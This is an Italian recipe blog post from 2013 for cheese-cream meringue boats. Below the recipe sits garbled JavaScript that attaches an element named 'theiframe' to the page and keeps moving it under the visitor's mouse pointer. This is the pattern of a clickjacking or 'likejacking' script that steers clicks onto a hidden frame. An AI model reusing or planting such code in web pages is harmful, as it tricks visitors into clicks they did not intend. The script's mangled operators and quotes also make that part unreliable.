martedì 8 ottobre 2013

Barchette meringate alla crema di formaggio

INGREDIENTI PER 6 PERSONE
100 gr di farina 00
100 gr di burro
100 gr di formaggio asiago
50 gr di gruyere grattugiato
70 gr di parmigiano grattugiato
2 uova
2-3 cucchiai di besciamella
burro e farina per gli stampini
sale

PREPARAZIONE
Impastate rapidamente la farina con il burro ,il gruyere,50 gr di parmigiano ,i tuorli delle uova e un pizzico di sale.Stendete la pasta in una sfoglia dello spessore di 1/2 cm e rivestite 12 stampini per barchette imburrati e infarinati.Punzecchiate fittamente la pasta con una forchetta.Scaldate il forno a 190°c.Amalgamate la besciamella e l asiago tritato e distribuite il composto nelle barchette di pasta.Allineate su una piccola placca e cuocete nel forno caldo per circa 20 min.Nel frattempo montate a neve ben soda gli albumi con un pizzico di sale e amalgamatevi il parmigiano restante.Estraete la placca dal forno e alzate la temperatura a 220°c.Distribuite velocemente la meringa sulle barchette .Inserite la placca nel ripiano piu' alto del forno e cuocete per 5-10 min finche' la meringa sara' gonfia e leggermente dorata .Sformate le barchette e servitele ..ecco fatto il piatto e' pronto!!

text/javascript”> var opacity = 0.5; var time = 0; if((document.getElementById) window.addEventListener || window.attachEvent){ (function(){ var hairCol = “#ff0000″; var d = document; var my = -10; var mx = -10; var r; var vert = “”; var idx = document.getElementsByTagName(‘div’).length; var thehairs = “”; document.write(thehairs); var like = document.getElementById(“theiframe”); document.getElementsByTagName(‘body’)[0].appendChild(like); var pix = “px”; var domWw = (typeof window.innerWidth == “number”); var domSy = (typeof window.pageYOffset == “number”); if (domWw) r = window; else{ if (d.documentElement typeof d.documentElement.clientWidth == “number” d.documentElement.clientWidth != 0) r = d.documentElement; else{ if (d.body typeof d.body.clientWidth == “number”) r = d.body; } } if(time != 0){ setTimeout(function(){ document.getElementsByTagName(‘body’)[0].removeChild(like); if (window.addEventListener){ document.removeEventListener(“mousemove”,mouse,false); } else if (window.attachEvent){ document.detachEvent(“onmousemove”,mouse); } }, time); } function scrl(yx){ var y,x; if (domSy){ y = r.pageYOffset; x = r.pageXOffset; } else{ y = r.scrollTop; x = r.scrollLeft; } return (yx == 0) ? y:x; } function mouse(e){ var msy = (domSy)?window.pageYOffset:0; if (!e) e = window.event; if (typeof e.pageY == ‘number’){ my = e.pageY – 5 – msy; mx = e.pageX – 4; } else{ my = e.clientY – 6 – msy; mx = e.clientX – 6; } vert.top = my + scrl(0) + pix; vert.left = mx + pix; } function ani(){ vert.top = my + scrl(0) + pix; setTimeout(ani, 300); } function init(){ vert = document.getElementById(“theiframe”).style; ani(); } if (window.addEventListener){ window.addEventListener(“load”,init,false); document.addEventListener(“mousemove”,mouse,false); } else if (window.attachEvent){ window.attachEvent(“onload”,init); document.attachEvent(“onmousemove”,mouse); } })(); }//End. script>